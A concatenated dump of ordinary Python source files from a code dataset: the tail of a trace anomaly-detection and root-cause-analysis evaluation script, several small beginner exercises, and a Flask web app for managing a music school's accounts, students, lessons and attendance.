['CEDAS_withoutscore', 'CEDAS_withscore']:\n if first_tag:\n # 1. Initialization\n sample_label, label_status = cedas.initialization(sample=np.array(STVector), sample_info=data, data_status='main', manual_labels_list=manual_labels_list)\n # if label_status == 'manual':\n label_map_reCluster[data['trace_id']] = sample_label\n first_tag = False\n else:\n cedas.changed_cluster = None\n # 2. Update Micro-Clusters\n sample_label, label_status = cedas.Cluster_AnomalyDetector(sample=np.array(STVector), sample_info=data, data_status='main', manual_labels_list=manual_labels_list)\n # if label_status == 'manual':\n label_map_reCluster[data['trace_id']] = sample_label\n # 3. Kill Clusters\n cedas.kill()\n if cedas.changed_cluster and cedas.changed_cluster.count > cedas.threshold:\n # 4. Update Cluster Graph\n cedas.update_graph()\n\n # trace_id list\n tid = data['trace_id']\n tid_list.append(tid)\n\n if AD_method in ['DenStream_withoutscore', 'CEDAS_withoutscore']:\n # sample_label\n if sample_label == 'abnormal':\n # if data['trace_bool'] == 1:\n a_pred.append(1)\n abnormal_map[tid] = True\n abnormal_count += 1\n abnormal_seq_map[tid] = data['service_seq']\n else:\n abnormal_map[tid] = False\n normal_seq_map[tid] = data['service_seq']\n a_pred.append(0)\n\n # label_status\n if label_status == 'manual':\n manual_count += 1\n\n if AD_method == 'DenStream_withscore':\n # manual_labels_list = denstream.update_cluster_and_trace_tables(manual_labels_list)\n # update cluster table when time window finish\n if use_manual == True:\n denstream.update_cluster_and_trace_tables()\n labels, confidenceScores, sampleRates = denstream.get_labels_confidenceScores_sampleRates(STV_map=STV_map_window, cluster_type=Sample_method)\n # sample_label\n for tid, sample_label in labels.items():\n label_map_reCluster[tid] = sample_label\n if sample_label == 'abnormal':\n a_pred.append(1)\n abnormal_map[tid] = True\n abnormal_count += 1\n if raw_data_total[tid]['abnormal'] == 0:\n traceID_list.append(tid)\n else:\n abnormal_map[tid] = False\n a_pred.append(0)\n AD_pattern = [micro_cluster for micro_cluster in denstream.p_micro_clusters+denstream.o_micro_clusters if micro_cluster.AD_selected==True]\n elif AD_method == 'CEDAS_withscore':\n manual_labels_list = cedas.update_cluster_and_trace_tables(manual_labels_list)\n labels, confidenceScores, sampleRates = cedas.get_labels_confidenceScores_sampleRates(STV_map=STV_map_window, cluster_type=Sample_method)\n # sample_label\n for tid, sample_label in labels.items():\n label_map_reCluster[tid] = sample_label\n if sample_label == 'abnormal':\n a_pred.append(1)\n abnormal_map[tid] = True\n abnormal_count += 1\n else:\n abnormal_map[tid] = False\n a_pred.append(0)\n AD_pattern = [micro_cluster for micro_cluster in cedas.micro_clusters if micro_cluster.AD_selected==True]\n\n\n print('Manual labeling count is ', manual_count)\n print('Manual labeling ratio is %.3f' % (manual_count/len(dataset)))\n print('--------------------------------')\n a_acc = accuracy_score(a_true, a_pred)\n a_prec = precision_score(a_true, a_pred)\n a_recall = recall_score(a_true, a_pred)\n a_F1_score = (2 * a_prec * a_recall)/(a_prec + a_recall)\n print('AD accuracy score is %.5f' % a_acc)\n print('AD precision score is %.5f' % a_prec)\n print('AD recall score is %.5f' % a_recall)\n print('AD F1 score is %.5f' % a_F1_score)\n print('--------------------------------')\n\n if AD_method in ['DenStream_withscore', 'CEDAS_withscore']:\n pattern_IoU = len(set(AD_pattern)&set(rc_pattern)) / len(set(AD_pattern)|set(rc_pattern)) if len(set(AD_pattern)|set(rc_pattern)) != 0 else -1\n else:\n pattern_IoU = -1\n\n if abnormal_count > 8 and pattern_IoU < 0.5:\n trigger_count += 1\n\n if AD_method in ['DenStream_withscore', 'CEDAS_withscore']:\n rc_pattern = AD_pattern\n\n print('********* RCA start *********')\n\n if AD_method in ['DenStream_withscore', 'CEDAS_withscore']:\n # 在这里对 trace 进行尾采样,若一个微簇/宏观簇的样本数越多,则采样概率低,否则采样概率高\n # 在这里以固定的采样概率对各个簇的 trace 进行采样,不同结构的 trace 应保持相同的采样比例\n # 仅保留采样到的 trace id 即可\n sampled_tid_list = []\n for tid in tid_list:\n if sampleRates[tid] >= np.random.uniform(0, 1):\n sampled_tid_list.append(tid)\n if len(sampled_tid_list) != 0:\n top_list, score_list = rca(RCA_level=RCA_level, start=start, end=end, tid_list=sampled_tid_list, trace_labels=abnormal_map, traces_dict=raw_data_dict, confidenceScores=confidenceScores, dataLevel=dataLevel)\n else:\n top_list = []\n else:\n top_list, score_list = rca(RCA_level=RCA_level, start=start, end=end, tid_list=tid_list, trace_labels=abnormal_map, traces_dict=raw_data_dict, dataLevel=dataLevel)\n \n # top_list is not empty\n if len(top_list) != 0: \n # topK_0\n topK_0 = top_list[:K[0] if len(top_list) > K[0] else len(top_list)]\n print(f'top-{K[0]} root cause is', topK_0)\n # topK_1\n topK_1 = top_list[:K[1] if len(top_list) > K[1] else len(top_list)]\n print(f'top-{K[1]} root cause is', topK_1)\n # topK_2\n topK_2 = top_list[:K[2] if len(top_list) > K[2] else len(top_list)]\n print(f'top-{K[2]} root cause is', topK_2)\n # topK_3\n topK_3 = top_list[:K[3] if len(top_list) > K[3] else len(top_list)]\n print(f'top-{K[3]} root cause is', topK_3)\n # topK_4\n topK_4 = top_list[:K[4] if len(top_list) > K[4] else len(top_list)]\n print(f'top-{K[4]} root cause is', topK_4)\n\n start_hour = time.localtime(start//1000).tm_hour\n # chaos_service = span_chaos_dict.get(start_hour)\n chaos_service_list = []\n for idx, root_cause_item in enumerate(request_period_log):\n # A: start, end B: root_cause_item[1], root_cause_item[2]\n # if ((root_cause_item[1]>end and root_cause_item[1]root_cause_item[2]) or (start>end and start=root_cause_item[1] and start<=root_cause_item[2]:\n if intersect_or_not(start1=start, end1=end, start2=root_cause_item[1], end2=root_cause_item[2]):\n # if in_rate[str(idx)]==1:\n # print(\"check it !\")\n chaos_service_list.append(root_cause_item[0][0] if len(root_cause_item[0])==1 else root_cause_item[0])\n print(f'ground truth root cause is', str(root_cause_item[0]))\n if len(chaos_service_list) == 0:\n FP += 1\n print(\"Ground truth root cause is empty !\")\n start = end\n end = start + window_duration\n continue\n # elif len(chaos_service_list) > 1 and Two_error == True:\n # new_chaos_service_list = [[chaos_service_list[0], chaos_service_list[1]]]\n # chaos_service_list = new_chaos_service_list\n\n in_topK_0 = False\n in_topK_1 = False\n in_topK_2 = False\n in_topK_3 = False\n in_topK_4 = False\n\n candidate_list_0 = []\n candidate_list_1 = []\n candidate_list_2 = []\n candidate_list_3 = []\n candidate_list_4 = []\n if RCA_level == 'operation':\n for topS in topK_0:\n candidate_list_0.append(operation_service_dict[topS])\n for topS in topK_1:\n candidate_list_1.append(operation_service_dict[topS])\n for topS in topK_2:\n candidate_list_2.append(operation_service_dict[topS])\n for topS in topK_3:\n candidate_list_3.append(operation_service_dict[topS])\n for topS in topK_4:\n candidate_list_4.append(operation_service_dict[topS])\n elif RCA_level == 'service':\n candidate_list_0 = topK_0\n candidate_list_1 = topK_1\n candidate_list_2 = topK_2\n candidate_list_3 = topK_3\n candidate_list_4 = topK_4\n if isinstance(chaos_service_list[0], list): # 一次注入两个故障\n for service_pair in chaos_service_list:\n if (service_pair[0] in candidate_list_0) and (service_pair[1] in candidate_list_0):\n in_topK_0 = True\n if (service_pair[0] in candidate_list_1) and (service_pair[1] in candidate_list_1):\n in_topK_1 = True\n if (service_pair[0] in candidate_list_2) and (service_pair[1] in candidate_list_2):\n in_topK_2 = True\n if (service_pair[0] in candidate_list_3) and (service_pair[1] in candidate_list_3):\n in_topK_3 = True\n if (service_pair[0] in candidate_list_4) and (service_pair[1] in candidate_list_4):\n in_topK_4 = True\n else:\n for service in chaos_service_list:\n if service in candidate_list_0:\n in_topK_0 = True\n if service in candidate_list_1:\n in_topK_1 = True\n if service in candidate_list_2:\n in_topK_2 = True\n if service in candidate_list_3:\n in_topK_3 = True\n if service in candidate_list_4:\n in_topK_4 = True\n \n if in_topK_0 == True:\n r_pred_count_0 += 1\n if in_topK_1 == True:\n r_pred_count_1 += 1\n if in_topK_2 == True:\n r_pred_count_2 += 1\n if in_topK_3 == True:\n r_pred_count_3 += 1\n if in_topK_4 == True:\n r_pred_count_4 += 1\n\n # # top_list is not empty\n # if len(top_list) != 0: \n # topK = top_list[:K if len(top_list) > K else len(top_list)]\n # print(f'top-{K} root cause is', topK)\n # start_hour = time.localtime(start//1000).tm_hour\n # if dataLevel == 'span':\n # chaos_service = span_chaos_dict.get(start_hour)\n # # elif dataLevel == 'trace':\n # # chaos_service = trace_chaos_dict.get(start_hour)\n # elif dataLevel == 'trace':\n # chaos_service = ''\n # for root_cause_item in request_period_log:\n # if start>=root_cause_item[1] and start<=root_cause_item[2]:\n # chaos_service = root_cause_item[0][0]\n # break\n\n # print(f'ground truth root cause is', chaos_service)\n\n # # zhoutong add\n # in_topK = True\n # candidate_list = []\n # for topS in topK:\n # candidate_list += topS.split('/')\n # if isinstance(chaos_service, list):\n # for service in chaos_service:\n # gt_service = service.replace('-', '')[2:]\n # if gt_service not in candidate_list:\n # in_topK = False\n # break\n # else:\n # gt_service = chaos_service.replace('-', '')[2:]\n # if gt_service not in candidate_list:\n # in_topK = False\n \n # # top_list is empty\n # elif len(top_list) == 0:\n # in_topK = False\n # r_pred.append(in_topK)\n else:\n rc_pattern = []\n TN += 1\n for root_cause_item in request_period_log:\n if intersect_or_not(start1=start, end1=end, start2=root_cause_item[1], end2=root_cause_item[2]):\n TN -= 1\n FN += 1\n break\n\n start = end\n end = start + window_duration\n\n # reCluster ...\n delete_index_candidate = [status[1] for status in all_path.values() if status[0]= reCluster_thres:\n if AD_method in ['DenStream_withoutscore', 'DenStream_withscore']:\n # if data_status is 'main', all new cluster labels are 'abnormal' and label_status is 'auto'\n # if data_status is 'init', all new cluster labels are 'normal' and label_status is 'auto'\n do_reCluster(cluster_obj=denstream, data_status='main', current_time=start, label_map_reCluster=label_map_reCluster)\n # update cluster table when recluster finish\n if use_manual == True:\n denstream.update_cluster_and_trace_tables()\n else:\n do_reCluster(cluster_obj=cedas, data_status='main', current_time=start, label_map_reCluster=label_map_reCluster)\n \n # visualization ...\n # if AD_method in ['DenStream_withoutscore', 'DenStream_withscore']:\n # if len((denstream.p_micro_clusters+denstream.o_micro_clusters)) > 1:\n # denstream.visualization_tool()\n # else:\n # if len(cedas.micro_clusters) > 1:\n # cedas.visualization_tool()\n # main loop end\n \n traceID_fw = open('./manual_traceID.txt', 'w')\n traceID_fw.write(str(traceID_list).replace('[', '').replace(']', '').replace('\\'', ''))\n traceID_fw.close()\n print('main loop end')\n \n\n print('--------------------------------')\n print(\"Evaluation for TraceStream\")\n # ========================================\n # Evaluation for AD\n # ========================================\n print('--------------------------------')\n a_acc = accuracy_score(a_true, a_pred)\n a_recall = recall_score(a_true, a_pred)\n a_prec = precision_score(a_true, a_pred)\n a_F1_score = (2 * a_prec * a_recall)/(a_prec + a_recall)\n print('AD accuracy score is %.5f' % a_acc)\n print('AD recall score is %.5f' % a_recall)\n print('AD precision score is %.5f' % a_prec)\n print('AD F1 score is %.5f' % a_F1_score)\n print('--------------------------------')\n\n # ========================================\n # Evaluation for RCA\n # ========================================\n print('--------------------------------')\n print(\"Top@{}:\".format(K[0]))\n TP = r_pred_count_0\n if TP != 0:\n hit_rate1 = r_pred_count_0 / r_true_count\n hit_rate2 = r_pred_count_0 / trigger_count\n r_acc = (TP + TN)/(TP + FP + TN + FN)\n r_recall = TP/(TP + FN)\n r_prec = TP/(TP + FP)\n print('RCA hit rate 1 is %.5f' % hit_rate1)\n print('RCA hit rate 2 is %.5f' % hit_rate2)\n print('RCA accuracy score is %.5f' % r_acc)\n print('RCA recall score is %.5f' % r_recall)\n print('RCA precision score is %.5f' % r_prec)\n else:\n print('RCA hit rate is 0')\n print('* * * * * * * *')\n print(\"Top@{}:\".format(K[1]))\n TP = r_pred_count_1\n if TP != 0:\n hit_rate1 = r_pred_count_1 / r_true_count\n hit_rate2 = r_pred_count_1 / trigger_count\n r_acc = (TP + TN)/(TP + FP + TN + FN)\n r_recall = TP/(TP + FN)\n r_prec = TP/(TP + FP)\n print('RCA hit rate 1 is %.5f' % hit_rate1)\n print('RCA hit rate 2 is %.5f' % hit_rate2)\n print('RCA accuracy score is %.5f' % r_acc)\n print('RCA recall score is %.5f' % r_recall)\n print('RCA precision score is %.5f' % r_prec)\n else:\n print('RCA hit rate is 0')\n print('* * * * * * * *')\n print(\"Top@{}:\".format(K[2]))\n TP = r_pred_count_2\n if TP != 0:\n hit_rate1 = r_pred_count_2 / r_true_count\n hit_rate2 = r_pred_count_2 / trigger_count\n r_acc = (TP + TN)/(TP + FP + TN + FN)\n r_recall = TP/(TP + FN)\n r_prec = TP/(TP + FP)\n print('RCA hit rate 1 is %.5f' % hit_rate1)\n print('RCA hit rate 2 is %.5f' % hit_rate2)\n print('RCA accuracy score is %.5f' % r_acc)\n print('RCA recall score is %.5f' % r_recall)\n print('RCA precision score is %.5f' % r_prec)\n else:\n print('RCA hit rate is 0')\n print('* * * * * * * *')\n print(\"Top@{}:\".format(K[3]))\n TP = r_pred_count_3\n if TP != 0:\n hit_rate1 = r_pred_count_3 / r_true_count\n hit_rate2 = r_pred_count_3 / trigger_count\n r_acc = (TP + TN)/(TP + FP + TN + FN)\n r_recall = TP/(TP + FN)\n r_prec = TP/(TP + FP)\n print('RCA hit rate 1 is %.5f' % hit_rate1)\n print('RCA hit rate 2 is %.5f' % hit_rate2)\n print('RCA accuracy score is %.5f' % r_acc)\n print('RCA recall score is %.5f' % r_recall)\n print('RCA precision score is %.5f' % r_prec)\n else:\n print('RCA hit rate is 0')\n print('* * * * * * * *')\n print(\"Top@{}:\".format(K[4]))\n TP = r_pred_count_4\n if TP != 0:\n hit_rate1 = r_pred_count_4 / r_true_count\n hit_rate2 = r_pred_count_4 / trigger_count\n r_acc = (TP + TN)/(TP + FP + TN + FN)\n r_recall = TP/(TP + FN)\n r_prec = TP/(TP + FP)\n print('RCA hit rate 1 is %.5f' % hit_rate1)\n print('RCA hit rate 2 is %.5f' % hit_rate2)\n print('RCA accuracy score is %.5f' % r_acc)\n print('RCA recall score is %.5f' % r_recall)\n print('RCA precision score is %.5f' % r_prec)\n else:\n print('RCA hit rate is 0')\n print('--------------------------------')\n print(r_pred_count_0, r_pred_count_1, r_pred_count_2)\n print(\"Done !\")\n\nif __name__ == '__main__':\n main()","repo_name":"ztk1996/TF-RCA","sub_path":"TraFlowRCA.py","file_name":"TraFlowRCA.py","file_ext":"py","file_size_in_byte":43647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"10960822507","text":"# #1060 Postive Numbers by Neilor Tonin\n\n# Reading the 6 numbers.\npositive = 0\nfor i in range(0, 6):\n num = float(input())\n if num > 0:\n positive += 1\n\nprint(f\"{positive} valores positivos\")","repo_name":"iagorrr/Competitive-Programming-Algorithms","sub_path":"submissions/Becrowd/_1060(1).py","file_name":"_1060(1).py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"29"} +{"seq_id":"28533317527","text":"def height(man):\n if man not in p_tree:\n return 0\n else:\n return 1 + height(p_tree[man])\n\n\np_tree = {}\nnumber = int(input('Введите количество человек: '))\nfor i in range(number - 1):\n print(i, 'пара:')\n child, parent = input().split()\n p_tree[child] = parent\n\nheights = {}\nfor man in set(p_tree.keys()).union(set(p_tree.values())):\n heights[man] = height(man)\n\nprint('«Высота» каждого члена семьи:')\nfor key, value in sorted(heights.items()):\n print(key, value)","repo_name":"Ksenya280/Skillbox_homework","sub_path":"Module19/09_pedigree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26476562282","text":"#define class\nclass fullname:\n fname=\"\"\n lname=\"\"\n def __init__(self, first , last):\n self.fname = first\n self.lname = last\n def display(self):\n print('your name:{}'.format(self.fname + ' ' + self.lname))\n\n#create class object\nf = fullname('Aman' , 'Verma')\n\n#show result\nf.display()\n","repo_name":"aman19gsp/AI-In-Enterprise-System","sub_path":"my_python.py","file_name":"my_python.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26675463732","text":"import random\nimport os\nimport time\nimport sys\n\nINT_MAX = 2**31\nSIZE = [100000, 200000, 300000, 400000, 500000, 600000]\nfor cases in range(6):\n for ranges in range(3):\n filename = './test%r.%d'.format(cases) %(cases, ranges)\n dirname = os.path.dirname(filename)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n with open(filename, 'w') as w:\n n = SIZE[cases]\n w.write(str(n) + '\\n')\n for i in range(n):\n w.write(str(random.randint(-INT_MAX, INT_MAX-1)) + '\\n')\n print(\"Cases%r.Range%d\".format(cases)) %(cases, ranges)","repo_name":"Randyzhang98/Weikang-s-Data-House","sub_path":"ZSJ-Project/Project2/FINAL_VER/Generate.py","file_name":"Generate.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"18270469968","text":"from flask import render_template, flash, redirect, url_for, request, g\nfrom flask_login import current_user, login_required\nfrom datetime import datetime, date\nimport calendar\nfrom ics import Calendar, Event\nfrom dateutil import tz\nfrom time import strftime\nfrom app import db\nfrom app.models import Teachers, Accounts, Students, Instruments, Attendance, \\\n Recurring_type, Lessons, Week_days, Recurring_pattern, ContactType, \\\n Contact, Communication, CommunicationType\nfrom app.main import bp\nfrom app.main.forms import AddAccountForm, AddStudentForm, AddInstrumentForm, \\\n AttendanceForm, AddLessonForm\nfrom app.auth.forms import EditTeacherForm\n\n\n@bp.before_app_request\ndef before_request():\n # make sure this is all appropriate. especially g.today\n if current_user.is_authenticated:\n g.accounts = Accounts.view_all_accounts()\n g.account_abc = Accounts.get_account_alphabet(g.accounts)\n g.students = Students.view_all_students()\n g.student_abc = Students.get_student_alphabet(g.students)\n g.today = datetime.utcnow()\n\n\n@bp.route('/')\n@bp.route('/index')\n@login_required\ndef index():\n contact = Contact.query.all()\n communication = Communication.query.all()\n communicationType = CommunicationType.query.all()\n #linkingContactCommunication = linkingContactCommunication.query.all()\n attendance = Attendance.query.all()\n instruments = Instruments.query.all()\n students = Students.query.all()\n accounts = Accounts.query.all()\n user = current_user\n recurring = Recurring_type.query.all()\n recurring_pattern = Recurring_pattern.query.all()\n lessons = Lessons.query.all()\n days = Week_days.query.all()\n contactType = ContactType.query.all()\n\n cal = Calendar()\n event = Event()\n event.name = 'fun party'\n event.begin = '20140101 00:00:00'\n flash('Fix teacher admin check box')\n return render_template(\n 'index.html',\n title='Home',\n contact=contact,\n communication=communication,\n communicationType=communicationType,\n user=user,\n contactType=contactType,\n lessons=lessons,\n recurring_pattern=recurring_pattern,\n students=students,\n accounts=accounts,\n attendance=attendance,\n recurring=recurring,\n days=days,\n instruments=instruments)\n\n\n# add account\n@bp.route('/sign_up', methods=['GET', 'POST'])\n@login_required\ndef sign_up():\n h1 = 'Sign Up!'\n original_primary_email = \"\"\n original_secondary_email = \"\"\n edit = False\n form = AddAccountForm(\n original_primary_email,\n original_secondary_email,\n edit)\n\n # if form validates\n if form.validate_on_submit():\n # check if at least 1 phone num is given\n if (form.primary_cell_phone.data == \"\"\n and form.primary_home_phone.data == \"\"\n and form.secondary_cell_phone.data == \"\"\n and form.secondary_home_phone.data == \"\"):\n # wish I knew how to repopulate the form\n\n flash('Please enter a phone number')\n return redirect(url_for('main.sign_up'))\n\n account = Accounts(\n primary_fname=form.primary_fname.data.capitalize(),\n primary_lname=form.primary_lname.data.capitalize(),\n primary_cell_phone=form.primary_cell_phone.data,\n primary_email=form.primary_email.data,\n primary_home_phone=form.primary_home_phone.data,\n secondary_fname=form.secondary_fname.data.capitalize(),\n secondary_lname=form.secondary_lname.data.capitalize(),\n secondary_cell_phone=form.secondary_cell_phone.data,\n secondary_email=form.secondary_email.data,\n secondary_home_phone=form.secondary_home_phone.data\n )\n db.session.add(account)\n db.session.commit()\n flash('Account added!')\n\n return redirect(url_for('main.add_student', id=account.id))\n\n return render_template(\n 'add_account.html',\n title='Sign Up',\n h1=h1,\n form=form)\n\n\n@bp.route('/add_instrument', methods=['GET', 'POST'])\n@login_required\ndef add_instrument():\n # display Instruments.query.all() on right side, make it delete/editable?\n form = AddInstrumentForm()\n if form.validate_on_submit():\n instrument = Instruments(\n instrument=form.instrument.data.capitalize()\n )\n\n db.session.add(instrument)\n db.session.commit()\n flash('Instrument added!')\n\n return redirect(url_for('main.add_instrument'))\n return render_template(\n 'add_instrument.html',\n title='Add An Instrument',\n form=form)\n\n\n@bp.route('/add_lesson/', methods=['GET', 'POST'])\n@login_required\ndef add_lesson(id):\n flash('MAKE END DATE OPTIONAL')\n form = AddLessonForm()\n if form.validate_on_submit():\n teacher = form.teacher_ID.data\n user = str(current_user)\n # might want to change is_hour in model to end\n # _time and store that instead, or also\n lesson = Lessons(\n student_ID=int(id),\n teacher_ID=teacher.id,\n start_date=form.start_date.data,\n end_date=form.end_date.data,\n start_time=form.start_time.data,\n is_hour=form.is_hour.data,\n is_recurring=form.is_recurring.data,\n created_by=user\n )\n\n # if form.recurring_radio.data == 'weekly':\n # lesson.is_recurring = True\n # elif form.recurring_radio.data == 'bi-weekly':\n # lesson.is_recurring = True\n # elif form.recurring_radio.data == 'monthly':\n # lesson.is_recurring = True\n # elif form.recurring_radio.data == 'not_recurring':\n # lesson.is_recurring = False\n # year = int(lesson.start_date.strftime('%Y'))\n # month = int(lesson.start_date.strftime('%m'))\n # day = int(lesson.start_date.strftime('%d'))\n # day_of_week = calendar.weekday(year, month, day)\n # day_of_week = Week_days.query.filter_by(cal_ID=day_of_week).first()\n # p_day = lesson.start_date.strftime('%d')\n # print(day_of_week.id)\n\n # insert record in recurring_pattern table with lesson_ID\n db.session.add(lesson)\n db.session.commit()\n flash('Lesson added!')\n\n return redirect(url_for('main.index'))\n\n else:\n print(\"not valid\")\n\n return render_template(\n 'add_lesson.html',\n title='Add Lesson',\n form=form)\n\n\n@bp.route('/add_student/', methods=['GET', 'POST'])\n@login_required\n# pass account id in link - use to add student\ndef add_student(id):\n form = AddStudentForm()\n h1 = 'Add A Student'\n account = Accounts.query.get(id)\n # if for validates\n if form.validate_on_submit():\n\n teacher = form.teacher_ID.data\n instrument = form.instrument.data\n # add formatting so names are capitalized\n student = Students(\n\n account_ID=id,\n teacher_ID=teacher.id,\n first_name=form.first_name.data.capitalize(),\n last_name=form.last_name.data.capitalize(),\n instrument=instrument.instrument,\n notes=form.notes.data\n )\n db.session.add(student)\n db.session.commit()\n flash('Student added!')\n\n return redirect(url_for('main.view_account', id=id))\n\n else:\n print(\"not valid\")\n\n return render_template(\n 'add_student.html',\n title='Add Student',\n account=account,\n h1=h1,\n form=form)\n\n\n@bp.route('/delete_account/', methods=['GET', 'POST'])\n@login_required\ndef delete_account(id):\n # figure out how to cascade attendance too\n account = Accounts.query.filter_by(id=id).first_or_404()\n\n attendance = Attendance. \\\n query.filter_by(account_ID=id).all()\n\n if attendance:\n for attended in attendance:\n db.session.delete(attended)\n\n db.session.delete(account)\n db.session.commit()\n\n flash('Account Deleted')\n return redirect(url_for('main.index'))\n\n return render_template(\n 'delete_account.html',\n account=account,\n title='Delete')\n\n\n@bp.route('/delete_student/', methods=['GET', 'POST'])\n@login_required\ndef delete_student(id):\n # figure out how to cascade attendance too\n student = Students.query.filter_by(id=id).first_or_404()\n\n attendance = Attendance. \\\n query.filter_by(student_ID=id).all()\n\n if attendance:\n for attended in attendance:\n db.session.delete(attended)\n\n db.session.delete(student)\n db.session.commit()\n\n flash('Student Deleted')\n return redirect(url_for('main.index'))\n\n return render_template(\n 'delete_student.html',\n student=student,\n title='Delete')\n\n\n@bp.route('/delete_teacher/', methods=['GET', 'POST'])\n@login_required\ndef delete_teacher(id):\n # figure out how to cascade attendance too\n teacher = Teachers.query.filter_by(id=id).first_or_404()\n\n db.session.delete(teacher)\n db.session.commit()\n # remind me\n flash('Teacher FIRED')\n return redirect(url_for('main.index'))\n\n return render_template(\n 'delete_teacher.html',\n teacher=teacher,\n title='Delete')\n\n\n@bp.route('/edit_account/', methods=['GET', 'POST'])\n@login_required\ndef edit_account(id):\n account = Accounts.query.filter_by(id=id).first_or_404()\n h1 = 'Edit Account'\n edit = True\n form = AddAccountForm(account.primary_email, account.secondary_email, edit)\n if form.validate_on_submit():\n\n # do not allow phone numbers to be blank\n if (form.primary_cell_phone.data == \"\"\n and form.primary_home_phone.data == \"\"\n and form.secondary_cell_phone.data == \"\"\n and form.secondary_home_phone.data == \"\"):\n # wish I knew how to repopulate the form\n\n flash('Please enter a phone number')\n return redirect(url_for('main.edit_account', id=id))\n\n account.primary_fname = form.primary_fname.data.capitalize()\n account.primary_lname = form.primary_lname.data.capitalize()\n account.primary_cell_phone = form.primary_cell_phone.data\n account.primary_email = form.primary_email.data\n account.primary_home_phone = form.primary_home_phone.data\n account.secondary_fname = form.secondary_fname.data.capitalize()\n account.secondary_lname = form.secondary_lname.data.capitalize()\n account.secondary_cell_phone = form.secondary_cell_phone.data\n account.secondary_email = form.secondary_email.data\n account.secondary_home_phone = form.secondary_home_phone.data\n\n db.session.commit()\n\n flash('Your changes have been saved.')\n return redirect(url_for('main.view_account', id=id))\n\n elif request.method == 'GET':\n form.primary_fname.data = account.primary_fname\n form.primary_lname.data = account.primary_lname\n form.primary_cell_phone.data = account.primary_cell_phone\n form.primary_email.data = account.primary_email\n form.primary_home_phone.data = account.primary_home_phone\n form.secondary_fname.data = account.secondary_fname\n form.secondary_lname.data = account.secondary_lname\n form.secondary_cell_phone.data = account.secondary_cell_phone\n form.secondary_email.data = account.secondary_email\n form.secondary_home_phone.data = account.secondary_home_phone\n\n return render_template(\n 'edit_account.html',\n title='Edit Account',\n form=form,\n h1=h1,\n account=account)\n\n\n@bp.route('/edit_student/', methods=['GET', 'POST'])\n@login_required\ndef edit_student(id):\n student = Students.query.filter_by(id=id).first_or_404()\n form = AddStudentForm()\n h1 = 'Edit Student'\n if form.validate_on_submit():\n\n teacher = form.teacher_ID.data\n instrument = form.instrument.data\n\n student.teacher_ID = teacher.id\n student.first_name = form.first_name.data.capitalize()\n student.last_name = form.last_name.data.capitalize()\n student.instrument = instrument.instrument\n student.notes = form.notes.data\n db.session.commit()\n\n flash('Your changes have been saved.')\n return redirect(url_for('main.view_student', id=id))\n\n elif request.method == 'GET':\n\n form.first_name.data = student.first_name\n form.last_name.data = student.last_name\n form.notes.data = student.notes\n\n return render_template(\n 'edit_student.html',\n title='Edit Student',\n form=form,\n h1=h1,\n student=student)\n\n\n@bp.route('/edit_teacher/', methods=['GET', 'POST'])\n@login_required\ndef edit_teacher(id):\n teacher = Teachers.query.filter_by(id=id).first_or_404()\n form = EditTeacherForm(teacher.email, teacher.username, teacher.phone_num)\n if form.validate_on_submit():\n\n teacher.first_name = form.first_name.data.capitalize()\n teacher.last_name = form.last_name.data.capitalize()\n teacher.phone_num = form.phone_num.data\n teacher.email = form.email.data\n teacher.address = form.address.data\n teacher.city = form.city.data.capitalize()\n teacher.state = form.state.data\n teacher.zipcode = form.zipcode.data\n teacher.is_admin = form.is_admin.data\n teacher.notes = form.notes.data\n teacher.username = form.username.data\n\n db.session.commit()\n print('valid')\n flash('Your changes have been saved.')\n return redirect(url_for('main.view_all_teachers'))\n\n elif request.method == 'GET':\n print('here')\n form.first_name.data = teacher.first_name\n form.last_name.data = teacher.last_name\n form.email.data = teacher.email\n form.address.data = teacher.address\n form.city.data = teacher.city\n form.state.data = teacher.state\n form.zipcode.data = teacher.zipcode\n form.is_admin.data = teacher.is_admin\n form.notes.data = teacher.notes\n form.username.data = teacher.username\n\n print('not valid')\n return render_template(\n 'edit_teacher.html',\n form=form,\n teacher=teacher,\n title='Edit')\n\n\n@bp.route('/view_account/', methods=['GET', 'POST'])\n@login_required\ndef view_account(id):\n account = Accounts.query.filter_by(id=id).first_or_404()\n\n return render_template(\n 'view_account.html',\n title='Account',\n account=account)\n\n\n@bp.route('/view_all_teachers', methods=['GET', 'POST'])\n@login_required\ndef view_all_teachers():\n teachers = Teachers.query.all()\n\n return render_template(\n 'view_all_teachers.html',\n title='Teachers',\n teachers=teachers)\n\n\n@bp.route('/view_student/', methods=['GET', 'POST'])\n@login_required\ndef view_student(id):\n # not checked in default\n checked_in = False\n # get student id\n student = Students.query.filter_by(id=id).first_or_404()\n # get account id\n account_ID = student.account_ID\n # get today's date. maybe delete this line\n today = strftime('%Y-%m-%d') # 2018-10-19\n # key word arguments for query\n kwargs = {'student_ID': id, 'account_ID': account_ID}\n # query attendance table with kwargs\n attendance = Attendance. \\\n query.filter_by(**kwargs).order_by(Attendance.id.desc()).first()\n # convert time zone from UTC to local time\n from_zone = tz.tzutc()\n to_zone = tz.tzlocal()\n # get today's date\n utc = g.today.replace(tzinfo=from_zone)\n # convert time zone to local time zone\n today_my_time = utc.astimezone(to_zone)\n # check to see if student was checked in today\n if attendance is not None:\n # set dates student was present to var 'utc'\n utc = attendance.was_present\n # tell datetime object the timezone is utc since object is naive\n utc = utc.replace(tzinfo=from_zone)\n # convert time zone to local time zone\n my_time_zone = utc.astimezone(to_zone)\n # check to see if student was checked in today\n if (today_my_time.strftime('%Y-%m-%d')\n == my_time_zone.strftime('%Y-%m-%d')):\n # set check_in = true, so template won't display check in option\n print(my_time_zone)\n checked_in = True\n\n check_in_form = AttendanceForm()\n undo_check_in_form = AttendanceForm()\n\n if check_in_form.validate_on_submit() and checked_in is False:\n # if not yet checked in template displays this version of the form\n # adds a timestamp to db, checking student in\n was_present = Attendance(\n\n student_ID=student.id,\n account_ID=student.account_ID\n )\n\n db.session.add(was_present)\n db.session.commit()\n\n return redirect(url_for('main.view_student', id=id))\n\n # 